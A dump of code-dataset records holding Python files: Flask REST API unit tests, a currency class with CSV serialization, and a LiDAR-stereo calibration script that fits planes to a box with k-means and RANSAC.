cf.fig5_addon_Fabian(LN_quantities_dict, plot_quantitiy_names,\n sigmas_quant_plot, mus_plot, sigmas_plot)\n\n","repo_name":"neuromethods/fokker-planck-based-spike-rate-models","sub_path":"adex_comparison/backup_with_extended_functionality/quantities_precalc_linearresponse.py","file_name":"quantities_precalc_linearresponse.py","file_ext":"py","file_size_in_byte":8708,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"37915709191","text":"from app import create_app\nimport unittest\n\n\n\nclass test_character(unittest.TestCase):\n app = create_app(config_name=\"testing\")\n client = app.test_client()\n\n ''' --------------------------------\n Testing the getALL / READ of the API's character\n --------------------------------------'''\n\n def test_getAll_character(self):\n # This formatting is due to JSON on windows ...\n self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n res = self.client.get('/character')\n self.assertEqual(res.status_code, 200)\n\n ''' --------------------------------\n Testing the getOne / READ one of the API's character\n --------------------------------------'''\n\n def test_getOne_character(self):\n self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n res = self.client.get('/oneCharacter', data=\"{\\\"id\\\": 7}\")\n self.assertEqual(res.status_code, 200)\n\n ''' --------------------------------\n Testing the CREATE / POST of the API's character\n --------------------------------------'''\n\n def test_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\": 7}\") # delete the character if exists\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n # check status code\n self.assertEqual(res.status_code, 201)\n # check the data sent with the status code As the order of the elements in the JSON may be different,\n # we only check that the correct id is return in the whole data\n self.assertIn(\"id\\\": 7\", str(res.data))\n\n def test_alreadyExist_create_character(self):\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 
3}\")\n # we send it a second time so the app should respond 'user already exists, 400\"\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n self.assertEqual(res.status_code, 400)\n\n def test_NoInput_create_character(self):\n res = self.client.post('/character')\n self.assertEqual(res.status_code, 400)\n\n def test_Age_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": -5,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n self.assertIn(\"age is not correct\", str(res.data))\n\n def test_Human_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"False\\\",\\\"hat\\\": 3}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn(\"can not create the character\", str(res.data))\n\n def testAgeAndWeight_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 8,\\\"weight\\\": 90,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn(\"weight is too big for age\", str(res.data))\n\n def test_YellowAndP_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n self.client.post('/hat', data=\"{\\\"id\\\": 7,\\\"colour\\\": \\\"YELLOW\\\"}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"p\\\",\\\"age\\\": 18,\\\"weight\\\": 50,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 7}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn(\"You have a p in your name, can not have a yellow hat\", str(res.data))\n\n ''' --------------------------------\n Testing the DELETE of the API's character\n --------------------------------------'''\n\n def test_delete_character(self):\n\n self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n res = self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n self.assertEqual(res.status_code, 200)\n self.assertIn(\"\\\"User deleted \\\": 7\", str(res.data))\n\n def test_Missing_delete_character(self):\n # First delete of the character, then another one\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n self.assertEqual(res.status_code, 400)\n\n def test_NoInput_delete_character(self):\n res = self.client.delete('/character')\n self.assertEqual(res.status_code, 400)\n\n ''' --------------------------------\n Testing the update / PUT of the API's character\n --------------------------------------'''\n\n def test_update_character(self):\n res = self.client.put('/character', data=\"{\\\"id\\\":1, \\\"name\\\":\\\"matt\\\"}\")\n self.assertEqual(res.status_code, 201)\n\n def test_NoInput_update_character(self):\n res = self.client.put('/character', data=\"{}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn('No input data provided', str(res.data))\n\n def test_NoExist_update_Character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = 
self.client.put('/character', data=\"{\\\"id\\\":7, \\\"name\\\":\\\"matt\\\"}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn('Character does not exist', str(res.data))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ouhibyann/Flask_REST-API","sub_path":"tests/test_character.py","file_name":"test_character.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38382149643","text":"\nclass Moneda:\n '''Representa un tipo de cambio, con su nombre y valores de compraventa'''\n def __init__(self, id='0', name='?', val_compra=0, val_venta=0) -> None:\n self._id = id\n self._name = name\n self._val_compra = val_compra\n self._val_venta = val_venta\n\n @classmethod\n def from_csv_entry(cls, val:str) -> object:\n '''Construye una instancia de Moneda a partir de valores separados por coma'''\n try:\n id, name, val_compra, val_venta = val.split(',')\n return cls(int(id), name, float(val_compra) ,float(val_venta))\n except ValueError as e:\n raise ValueError('Error al parsear entrada de CSV de moneda: ({})'.format(val.replace(\"\\n\", \"\")))\n\n def as_dict(self) -> dict:\n '''Obtiene una representación en forma de diccionario de la moneda'''\n return {\n 'id':self._id,\n 'value1':self._val_compra,\n 'value2':self._val_venta,\n 'name':self._name,\n }\n\n def serialize_csv(self):\n '''Serializa la moneda en una entrada separada por comas'''\n return f'{self._id},{self._name},{self._val_compra},{self._val_venta}'\n\n def __eq__(self, o: object) -> bool:\n if isinstance(o, Moneda):\n return all((\n self._id == o._id,\n self._name == o._name,\n self._val_compra == o._val_compra,\n self._val_venta == o._val_venta,\n )) \n else:\n super.__eq__(self, o)\n \n\n\n","repo_name":"lorsi96/DASO_TP1","sub_path":"src/currencylib/moneda.py","file_name":"moneda.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41585199976","text":"import argparse\nimport struct\nimport time\n\nimport numpy as np\nimport open3d as o3d\nimport plotly.graph_objs as go\nfrom scipy.spatial import distance\nfrom sklearn.cluster import KMeans\nfrom scipy.spatial.transform import Rotation\nimport os\n\nglobal debug\n\n\ndef main(pcd, pcd_object, threshold, name, threshold_ransac, length, width, height):\n object_isolated = compute_distance(pcd, pcd_object, threshold, name) # remove points appearing in both data\n\n normals_estimated = normal_estimation(object_isolated) # estimate normals\n right, left, top = kmeans(normals_estimated, name) # run kmean on object, returns planes detected\n\n plane_model_a = plane_model_b = plane_model_c = plane_model_r = plane_model_t = plane_model_l = np.empty((0, 4))\n a_in = b_in = c_in = a_out = b_out = c_out = r_in = l_in = t_in = np.empty((0, 3))\n x = []\n plane_name_a = plane_name_b = plane_name_c = ''\n \"\"\"\n Ransac on plane, with 3 randomly chosen start points and 500 iterations\n \"\"\"\n for i in range(100):\n a_in, a_out, plane_model_a_, plane_name_a = ransac(right, threshold_ransac, 3, 1000)\n b_in, b_out, plane_model_b_, plane_name_b = ransac(left, threshold_ransac, 3, 1000)\n c_in, c_out, plane_model_c_, plane_name_c = ransac(top, threshold_ransac, 3, 1000)\n x.append(i)\n plane_model_a = np.append(plane_model_a, plane_model_a_, axis=0)\n plane_model_b = np.append(plane_model_b, plane_model_b_, axis=0)\n plane_model_c = np.append(plane_model_c, 
plane_model_c_, axis=0)\n\n \"\"\"\n Take mean of 100 ransac iterations\n \"\"\"\n plane_model_a = np.divide(np.sum(plane_model_a, axis=0), len(x))\n plane_model_b = np.divide(np.sum(plane_model_b, axis=0), len(x))\n plane_model_c = np.divide(np.sum(plane_model_c, axis=0), len(x))\n if debug:\n inl1 = getTrace(a_in[:, 0], a_in[:, 1], a_in[:, 2], c=\"green\", s=4, label=f\"{plane_name_a} inliers\")\n inl2 = getTrace(b_in[:, 0], b_in[:, 1], b_in[:, 2], c=\"green\", s=4, label=f\"{plane_name_b} inliers\")\n inl3 = getTrace(c_in[:, 0], c_in[:, 1], c_in[:, 2], c=\"green\", s=4, label=f\"{plane_name_c} inliers\")\n out1 = getTrace(a_out[:, 0], a_out[:, 1], a_out[:, 2], c=\"red\", s=4, label=f\"{plane_name_a} outliers\")\n out2 = getTrace(b_out[:, 0], b_out[:, 1], b_out[:, 2], c=\"red\", s=4, label=f\"{plane_name_b} outliers\")\n out3 = getTrace(c_out[:, 0], c_out[:, 1], c_out[:, 2], c=\"red\", s=4, label=f\"{plane_name_c} outliers\")\n showGraph(f\"RANSAC {name}\",\n \"Z\", \"X\", \"Y\",\n [inl1, inl2, inl3, out1, out2, out3])\n\n \"\"\"\n Planes will be assigned to side\n \"\"\"\n if plane_name_a == \"Top\":\n t_in, t_out, plane_model_t = a_in, a_out, plane_model_a\n elif plane_name_a == \"Left\":\n l_in, l_out, plane_model_l = a_in, a_out, plane_model_a\n elif plane_name_a == \"Right\":\n r_in, r_out, plane_model_r = a_in, a_out, plane_model_a\n if plane_name_b == \"Top\":\n t_in, t_out, plane_model_t = b_in, b_out, plane_model_b\n elif plane_name_b == \"Left\":\n l_in, l_out, plane_model_l = b_in, b_out, plane_model_b\n elif plane_name_b == \"Right\":\n r_in, r_out, plane_model_r = b_in, b_out, plane_model_b\n if plane_name_c == \"Top\":\n t_in, t_out, plane_model_t = c_in, c_out, plane_model_c\n elif plane_name_c == \"Left\":\n l_in, l_out, plane_model_l = c_in, c_out, plane_model_c\n elif plane_name_c == \"Right\":\n r_in, r_out, plane_model_r = c_in, c_out, plane_model_c\n\n inliers = np.concatenate((t_in, l_in, r_in))\n\n if debug:\n print(f\"Plane equation top: {plane_model_t[0]:.2f}x + {plane_model_t[1]:.2f}y \"\n f\"+ {plane_model_t[2]:.2f}z + {plane_model_t[3]:.2f} = 0\")\n print(f\"Plane equation left: {plane_model_l[0]:.2f}x + {plane_model_l[1]:.2f}y \"\n f\"+ {plane_model_l[2]:.2f}z + {plane_model_l[3]:.2f} = 0\")\n print(f\"Plane equation right: {plane_model_r[0]:.2f}x + {plane_model_r[1]:.2f}y \"\n f\"+ {plane_model_r[2]:.2f}z + {plane_model_r[3]:.2f} = 0\")\n\n \"\"\"\n Find intersections line\n \"\"\"\n vektor_rt = plane_intersect(plane_model_r, plane_model_t)\n vektor_lt = plane_intersect(plane_model_l, plane_model_t)\n vektor_rl = plane_intersect(plane_model_r, plane_model_l)\n\n \"\"\"\n Find intersections\n \"\"\"\n \"\"\" Intersection of all 3 planes \"\"\"\n schnittpunkt = finde_intersection(plane_model_r, plane_model_l, plane_model_t, \"Schnittpunkt 1\")\n \"\"\" Intersection down \"\"\"\n schnittpunkt2 = intersection(vektor_rl, height, schnittpunkt)\n \"\"\" Intersection right top \"\"\"\n schnittpunkt3 = intersection(vektor_rt, -width, schnittpunkt)\n \"\"\" Intersection left top \"\"\"\n schnittpunkt4 = intersection(vektor_lt, -length, schnittpunkt)\n \"\"\" Intersection back top \"\"\"\n schnittpunkt5 = intersection(vektor_lt, -length, schnittpunkt3)\n \"\"\" Intersection right down \"\"\"\n schnittpunkt6 = intersection(vektor_rt, -width, schnittpunkt2)\n \"\"\" Intersection left down \"\"\"\n schnittpunkt7 = intersection(vektor_lt, -length, schnittpunkt2)\n s_all = np.concatenate((schnittpunkt, schnittpunkt2, schnittpunkt3, schnittpunkt4, schnittpunkt5, 
schnittpunkt6,\n schnittpunkt7))\n if debug:\n \"\"\"\n return angle in degrees\n \"\"\"\n find_winkel(vektor_rt, vektor_lt, f\"R + L {name}\")\n find_winkel(vektor_rl, vektor_rt, f\"T + L {name}\")\n find_winkel(vektor_rl, vektor_lt, f\"R + T {name}\")\n\n return s_all, inliers\n\n\n\"\"\"\nDeprecated, only needed if Data is in binary format\n\"\"\"\n\n\ndef convert_kitti_bin_to_pcd(bin, name):\n \"\"\"\n Converts binary data to open3d point cloud\n :param bin: Numpy Array if Data is in binary format\n :param name: name of the data\n :return: open3d point cloud\n \"\"\"\n size_float = 4\n list_pcd = []\n with open(bin, \"rb\") as f:\n byte = f.read(size_float * 4)\n while byte:\n x, y, z, intensity = struct.unpack(\"ffff\", byte)\n # if 4 <= x <= 30 and -5 <= y <= 5: # necessary if pre-cutting is wanted\n list_pcd.append([x, y, z])\n byte = f.read(size_float * 4)\n np_pcd = np.asarray(list_pcd)\n pcd = toPointCloud(np_pcd)\n if debug:\n o3d.visualization.draw_geometries([pcd], height=800, width=800, mesh_show_back_face=False)\n return pcd\n\n\n\"\"\"\nSection 1: Support functions\n\"\"\"\n\n\ndef transform_stereo(ob):\n \"\"\"\n Transformates Stereo data to lidar coordinate systems\n :param ob: open3d point cloud\n :return: open3d point cloud transformed\n \"\"\"\n trans_matrix = np.array([[0., -1., 0.],\n [0., 0., -1.],\n [1., 0., 0.]])\n np_object_isolated = np.array(ob.points)\n object1 = np.matmul(np_object_isolated, trans_matrix)\n object1 = toPointCloud(object1)\n return object1\n\n\ndef toPointCloud(points):\n \"\"\"\n Converts Numpy Array to open3d point cloud\n :param points: numpy array\n :return: open3d point cloud\n \"\"\"\n pointcloud = o3d.geometry.PointCloud()\n pointcloud.points = o3d.utility.Vector3dVector(points)\n return pointcloud\n\n\ndef remove_points_extended(file, cut):\n \"\"\"\n Remove points outside of a defined boundary\n :param file: data in open3d point cloud format\n :param cut: boundarys with x, y, z\n :return: cropped data\n \"\"\"\n point = np.asarray(file.points)\n point_new = point[(point[:, 0] > cut[0]) & (point[:, 0] < cut[1])\n & (point[:, 1] > cut[2]) & (point[:, 1] < cut[3])\n & (point[:, 2] > cut[4]) & (point[:, 2] < cut[5])]\n pcd_new = toPointCloud(point_new)\n return pcd_new\n\n\ndef remove_points(file, i):\n \"\"\"\n Remove points on the y-axle smaller than 0\n :param file: open3d point cloud\n :param i: threshold\n :return: cropped data\n \"\"\"\n point = np.asarray(file.points)\n point_new = point[(point[:, 2] > i)]\n pcd_new = toPointCloud(point_new)\n return pcd_new\n\n\ndef plane_intersect(a, b):\n \"\"\"\n calculate intersection points of planes\n :param a: numpy array, plane 1\n :param b: numpy array, plane 2\n :return: vector of line\n \"\"\"\n a_vec, b_vec = np.array(a[:3]), np.array(b[:3])\n aXb_vec = np.cross(a_vec, b_vec)\n\n return aXb_vec\n\n\ndef find_winkel(plane1, plane2, name):\n \"\"\"\n calculate angle\n :param plane1: numpy array, plane 1\n :param plane2: numpy array, plane 2\n :param name: string, name of plane\n \"\"\"\n plane1 = np.squeeze(np.asarray(plane1))\n plane2 = np.squeeze(np.asarray(plane2))\n nenner = np.dot(plane1[:3], plane2[:3])\n x_modulus = np.sqrt((plane1[:3] * plane1[:3]).sum())\n y_modulus = np.sqrt((plane2[:3] * plane2[:3]).sum())\n cos_angle = nenner / x_modulus / y_modulus\n angle = np.arccos(cos_angle)\n angle2 = angle * 360 / 2 / np.pi\n print(f\"Winkel {name}:\", angle2)\n\n\ndef geteuclideandistance(points_lidar, points_stereo):\n \"\"\"\n Get euclidean distance of intersection points of lidar 
and stereo data\n :param points_lidar: numpy array, intersection points lidar\n :param points_stereo: numpy array, intersection points stereo\n \"\"\"\n dist = []\n for i in range(len(points_lidar)):\n dist.append(distance.euclidean(points_lidar[i, :], points_stereo[i, :]))\n print(\"Euclidean Distance\", dist)\n\n\ndef test_function(intersection, p1, p2, p3, name):\n \"\"\"\n Tests intersections with all equations if equals 0, if not prints value\n :param intersection: numpy array, intersection\n :param p1: numpy array, plane 1\n :param p2: numpy array, plane 2\n :param p3: numpy array, plane 3\n :param name: name of plane\n \"\"\"\n test1 = (p1[0] * intersection[0]) + (p1[1] * intersection[1]) + (p1[2] * intersection[2]) + p1[3]\n test2 = (p2[0] * intersection[0]) + (p2[1] * intersection[1]) + (p2[2] * intersection[2]) + p2[3]\n test3 = (p3[0] * intersection[0]) + (p3[1] * intersection[1]) + (p3[2] * intersection[2]) + p3[3]\n print(name)\n if test1 != 0 or test1 != 0.2 or test1 != -0.2:\n print(\"Testgleichung Plane 1: \", test1)\n if test2 != 0 or test2 != 0.35 or test2 != -0.35:\n print(\"Testgleichung Plane 2: \", test2)\n if test3 != 0 or test3 != 0.45 or test3 != -0.45:\n print(\"Testgleichung Plane 3: \", test3)\n\n\ndef point_alignments(r, t, datapoints):\n \"\"\"\n Aligns stereo data on lidar data with given rotation and translation\n :param datapoints: numpy array, data of stereo packet\n :param r: numpy array, rotation\n :param t: numpy array, translation\n :return: right side, left side, top side, intersection points, all transformed\n \"\"\"\n points_aligned = np.add(np.dot(datapoints, r.T), t.T)\n return points_aligned\n\n\n\"\"\"\nSection 2: Algorithms\n\"\"\"\n\n\ndef compute_distance(data, data_object, threshold, name):\n \"\"\"\n Computes the distance between two point clouds and removes the points bigger then set threshold.\n In the second step a statistical outlier removal is applied (see next function)\n :param data: open3d point cloud without object\n :param data_object: open3d point cloud with object\n :param threshold: predefined threshold\n :param name: Stereo or Lidar\n :return: exposed object\n \"\"\"\n dists = data_object.compute_point_cloud_distance(data)\n dists = np.asarray(dists)\n ind = np.where(dists > threshold)[0]\n dist_obj = data_object.select_by_index(ind)\n inlier_cloud = statistical_outlier(dist_obj, name)\n return inlier_cloud\n\n\ndef statistical_outlier(cloud, name):\n \"\"\"\n Removes noise based on statistic\n :param cloud: open3d point cloud with object and noise\n :param name: name of the object\n :return: open3d point cloud object with reduced or no noise\n \"\"\"\n cl, ind = cloud.remove_statistical_outlier(nb_neighbors=500, std_ratio=0.01)\n inlier_cloud = cloud.select_by_index(ind)\n if debug:\n display_inlier_outlier(cloud, ind, name)\n return inlier_cloud\n\n\ndef normal_estimation(downpcd):\n \"\"\"\n Estimates normales of point cloud\n :param downpcd: open3d point cloud\n :return: open3d point cloud with normals\n \"\"\"\n downpcd.normals = o3d.utility.Vector3dVector(np.zeros((1, 3)))\n downpcd.estimate_normals(\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=50))\n downpcd.orient_normals_towards_camera_location()\n if debug:\n showPointCloud(downpcd, \"Normals\", True)\n return downpcd\n\n\ndef kmeans(pc, name):\n \"\"\"\n Applies k-Means Algorithm to object, with k-means+++\n :param pc: open3d point cloud\n :return: 3 planes: top, left, right as numpy array\n \"\"\"\n normals = np.asarray(pc.normals)\n 
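# NOTE: clustering runs on the unit normals rather than the xyz coordinates --\n    # the box's three visible faces differ mainly by orientation, so k=3 k-means\n    # on normals separates top/left/right even where the faces touch in space\n    # (e.g. normals near (0,0,1) land in one cluster, near (1,0,0) in another,\n    # regardless of where the points themselves sit). This comment is an added\n    # reading aid; the algorithm below is unchanged.\n    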
points = np.asarray(pc.points)\n kmeans = KMeans(n_clusters=3, init='k-means++', max_iter=1000, n_init=10)\n\n y_kmeans = kmeans.fit_predict(normals)\n # visualising the clusters\n if debug:\n centroids = getTrace(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1],\n kmeans.cluster_centers_[:, 2],\n s=8, c='yellow', label='Centroids')\n\n t1 = getTrace(points[y_kmeans == 0, 0], points[y_kmeans == 0, 1], points[y_kmeans == 0, 2], s=4, c='red',\n label='Top') # match with red=1 initial class\n t2 = getTrace(points[y_kmeans == 1, 0], points[y_kmeans == 1, 1], points[y_kmeans == 1, 2], s=4, c='green',\n label='Left') # match with green=3 initial class\n t3 = getTrace(points[y_kmeans == 2, 0], points[y_kmeans == 2, 1], points[y_kmeans == 2, 2], s=4, c='blue',\n label='Right') # match with blue=2 initial class\n\n showGraph(\n f\"k-Means {name}\",\n \"Z\", \"X\", \"Y\",\n [t1, t2, t3]) # , centroids])\n\n top_p = np.stack((points[y_kmeans == 0, 0], points[y_kmeans == 0, 1], points[y_kmeans == 0, 2]), axis=1)\n left_p = np.stack((points[y_kmeans == 1, 0], points[y_kmeans == 1, 1], points[y_kmeans == 1, 2]), axis=1)\n right_p = np.stack((points[y_kmeans == 2, 0], points[y_kmeans == 2, 1], points[y_kmeans == 2, 2]), axis=1)\n\n right_pc = toPointCloud(right_p)\n left_pc = toPointCloud(left_p)\n top_pc = toPointCloud(top_p)\n return right_pc, left_pc, top_pc\n\n\ndef ransac(plane, threshold, n, i):\n \"\"\"\n Computes plane equation with ransac algorithm and gets side of given plane (top, right, left)\n :param plane: open3d point cloud\n :param threshold: threshold for plane\n :param n: number of start points\n :param i: number of iterations\n :return: inliers (numpy array), outliers (numpy array), plane equation (numpy array), name\n \"\"\"\n plane_model, inliers = plane.segment_plane(distance_threshold=threshold,\n ransac_n=n,\n num_iterations=i)\n [a, b, c, d] = plane_model\n name, [a, b, c, d] = equation(a, b, c, d)\n inlier_cloud = plane.select_by_index(inliers)\n outlier_cloud = plane.select_by_index(inliers, invert=True)\n inlier_cloud = np.asarray(inlier_cloud.points)\n outlier_cloud = np.asarray(outlier_cloud.points)\n\n return inlier_cloud, outlier_cloud, np.array([[a, b, c, d]]), name\n\n\ndef icp(l_all, s_all):\n \"\"\"\n Iterative closest point algorithm to find convergence between lidar and stereo data\n :param l_all: numpy array, intersection points lidar\n :param s_all: numpy array, intersection points stereo\n :return: rotation and translation matrices\n \"\"\"\n mass_center_l = np.divide(np.sum(l_all, axis=0), len(l_all))\n mass_center_s = np.divide(np.sum(s_all, axis=0), len(l_all))\n q = np.subtract(l_all, mass_center_l)\n p = np.subtract(s_all, mass_center_s)\n q = q.T\n p = p.T\n w = np.dot(q, p.T)\n u_l, s_l, vh_l = np.linalg.svd(w)\n r = np.dot(u_l, vh_l)\n t = np.subtract(mass_center_l, np.dot(r, mass_center_s))\n print(\"r_matrix\", r)\n print(\"r_quat\", Rotation.from_matrix(r).as_quat())\n print(\"t\", t)\n return r, t\n\n\ndef intersection(equation, cm, intersect):\n \"\"\"\n Find other intersection based on dimensions of object\n :param equation: numpy array, vector of intersection line\n :param cm: float, dimension of object in cm\n :param intersect: numpy array, start intersection\n :return: numpy array, calculated intersection point\n \"\"\"\n a = np.multiply(equation, cm)\n s = np.subtract(intersect.reshape(-1, 3), a)\n s_shape = np.array(s)\n return s_shape\n\n\ndef equation(plane_x, plane_y, plane_z, plane_):\n \"\"\"\n Gets side of given plane\n :param 
plane_x: numpy array, x-value of plane equation\n :param plane_y: numpy array, y-value of plane equation\n :param plane_z: numpy array, z-value of plane equation\n :return: plane name as string\n \"\"\"\n plane_name = \"\"\n while plane_name == \"\":\n if plane_x > 0 and plane_y > 0 and plane_z > 0:\n plane_name = \"Right\"\n break\n elif plane_x < 0 and plane_z > 0:\n plane_name = \"Top\"\n break\n elif plane_x < 0 and plane_z < 0:\n plane_name = \"Left\"\n break\n else:\n plane_x = plane_x * -1\n plane_y = plane_y * -1\n plane_z = plane_z * -1\n plane_ = plane_ * -1\n return plane_name, [plane_x, plane_y, plane_z, plane_]\n\n\ndef finde_intersection(plane1, plane2, plane3, name):\n \"\"\"\n Finds intersection points and test them against equations\n :param plane1: numpy array, first plane\n :param plane2: numpy array, second plane\n :param plane3: numpy array, third plane\n :param name: string, name of the plane\n :return: numpy array with intersection\n \"\"\"\n left_side = [plane1[:3]] + [plane2[:3]] + [plane3[:3]]\n right_side = [[-plane1[3]]] + [[-plane2[3]]] + [[-plane3[3]]]\n i_p = np.linalg.solve(left_side, right_side)\n if debug:\n test_function(i_p, plane1, plane2, plane3, name)\n ip = np.array(i_p.reshape(-1, 3))\n return ip\n\n\n\"\"\"\nSection 3: Plot functions\n\"\"\"\n\n\ndef display_inlier_outlier(cloud, ind, string):\n \"\"\"\n Shows points point cloud with outlier points (red) and inlier points (grey) after statistical outlier removal\n :param cloud: open3d point cloud object\n :param ind: index if outlier or inlier\n :param string: name of object\n \"\"\"\n inlier_cloud = cloud.select_by_index(ind)\n outlier_cloud = cloud.select_by_index(ind, invert=True)\n print(\"Showing outliers (red) and inliers (gray): \")\n outlier_cloud.paint_uniform_color([1, 0, 0])\n inlier_cloud.paint_uniform_color([0.8, 0.8, 0.8])\n o3d.visualization.draw_geometries([inlier_cloud, outlier_cloud],\n window_name=string, height=800, width=800, mesh_show_back_face=False)\n\n\ndef getTrace(x, y, z, c, label, s=2):\n \"\"\"\n Prepares data for plotting in plotly, accepts points in 3D-Coordinatesystem\n :param x: x-value in numpy array\n :param y: y-value in numpy array\n :param z: z-value in numpy array\n :param c: color of points\n :param label: label of points\n :param s: size of points\n :return: plotly trace points\n \"\"\"\n trace_points = go.Scatter3d(\n x=x, y=y, z=z,\n mode='markers',\n marker=dict(size=s, line=dict(color='rgb(0, 0, 0)', width=0.5), color=c, opacity=1),\n name=label\n )\n return trace_points\n\n\ndef getMesh(x, y, z, c, label, v, s=4):\n \"\"\"\n Prepares data for plotting in plotly, draws lines\n :param x: numpy array, x-value\n :param y: numpy array, y-value\n :param z: numpy array, z-value\n :param c: string, color of points\n :param label: string, label of points\n :param s: int, size of points\n :param v: string, visibility, set to only appear on legend\n :return: plotly line mesh\n \"\"\"\n surface_points = go.Scatter3d(\n x=x, y=y, z=z,\n mode='lines',\n marker=dict(size=s, line=dict(color='rgb(0, 0, 0)', width=0.5), color=c, opacity=1),\n name=label,\n visible=v\n )\n return surface_points\n\n\ndef showPointCloud(object, name, show_normal):\n \"\"\"\n Plots point cloud\n :param object: open3d point cloud\n :param name: string, name ob plot\n :param show_normal: boolean, displays normals\n \"\"\"\n if name == '':\n name = \"Objekt\"\n if show_normal == '':\n show_normal = False\n o3d.visualization.draw_geometries([object], \"name\", height=800, width=800,\n 
point_show_normal=show_normal, mesh_show_back_face=False)\n\n\ndef showGraph(title, x_colname, y_colname, z_colname, traces):\n \"\"\"\n Shows plotly plot in browser\n :param title: string, headline of plot\n :param x_colname: string, name of x-axle\n :param y_colname: string, name of y-axle\n :param z_colname: string, name of z-axle\n :param traces: plotly format, data to display\n \"\"\"\n layout = go.Layout(\n scene=dict(\n xaxis=dict(title=x_colname, autorange=True),\n yaxis=dict(title=y_colname, autorange=True),\n zaxis=dict(title=z_colname, autorange=True)\n )\n )\n\n camera = dict(\n up=dict(x=0, y=0, z=1),\n center=dict(x=0, y=0, z=0),\n eye=dict(x=-2, y=0, z=0.5)\n )\n\n fig = go.Figure(data=traces, layout=layout)\n fig.update_layout(scene_camera=camera, title=title)\n # plotly.offline.plot(fig, filename='packet_data/test_data/' + title + '.html')\n fig.show()\n\n\ndef drawIntersectionLines(intersections, name, color):\n \"\"\"\n prepares data for plotly, namely plots intersection lines\n :param intersections: numpy array with all intersection points\n :param name: name of point cloud\n :param color: color of plotted lines\n :return: plotly trace lines\n \"\"\"\n line_1 = np.concatenate(([intersections[0]], [intersections[2]], [intersections[4]],\n [intersections[3]], [intersections[0]]), axis=0)\n line_2 = np.concatenate(([intersections[0]], [intersections[1]], [intersections[5]], [intersections[2]]), axis=0)\n line_3 = np.concatenate(([intersections[1]], [intersections[6]], [intersections[3]]), axis=0)\n\n line_1 = getMesh(line_1[:, 0], line_1[:, 1], line_1[:, 2],\n c=color, label=f\"{name}\", v=\"legendonly\")\n line_2 = getMesh(line_2[:, 0], line_2[:, 1], line_2[:, 2],\n c=color, label=f\"{name}\", v=\"legendonly\")\n line_3 = getMesh(line_3[:, 0], line_3[:, 1], line_3[:, 2],\n c=color, label=f\"{name}\", v=\"legendonly\")\n return line_1, line_2, line_3\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--debug\", action=\"store_true\", help=\"Debug on/off\")\n parser.add_argument(\"-dl\", \"--distance_lidar\", help=\"Value for Distance Computing for Lidar\",\n default=0.1, type=float)\n parser.add_argument(\"-ds\", \"--distance_stereo\", help=\"Value for Distance Computing for Stereo\",\n default=0.05, type=float)\n parser.add_argument(\"-rl\", \"--ransac_lidar\", help=\"Value for Ransac Threshold for Lidar\",\n default=0.01, type=float)\n parser.add_argument(\"-rs\", \"--ransac_stereo\", help=\"Value for Ransac Threshold for Stereo\",\n default=0.004, type=float)\n parser.add_argument(\"-xmin\", \"--x_minimum\", help=\"Minimum value for cropping in x-direction\",\n default=5, type=float)\n parser.add_argument(\"-xmax\", \"--x_maximum\", help=\"Maximum value for cropping in x-direction\",\n default=8, 